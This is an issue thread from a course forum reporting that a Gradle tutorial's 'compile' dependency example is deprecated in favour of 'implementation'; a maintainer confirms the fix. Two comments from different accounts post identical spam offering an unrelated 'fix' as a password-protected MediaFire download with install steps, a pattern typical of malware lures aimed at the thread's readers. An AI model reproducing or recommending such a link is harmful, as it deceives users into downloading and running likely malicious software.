### ISSUE TITLE
Typo/Deprecated example for Gradle Dependencies

### ISSUE THREAD

**Issue by Domokunx** [nus-cs2103-AY2425S1/forum#94]
Site: [Gradle Tutorial](https://se-education.org/guides/tutorials/gradle.html)

Under "Managing plugins and dependencies" section in the Gradle tutorial website, there's an example on how to add the "natty" dependency:
```
compile group: 'com.joestelmach', name: 'natty', version: '0.6'
```
"compile" doesn't work for me and a quick search says that it is no longer supported, and we should use "implementation" instead.
```
implementation group: 'com.joestelmach', name: 'natty', version: '0.6'
```

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by damithc** [comment]
Thanks for the bug report, @Domokunx 💯 
Fixed.
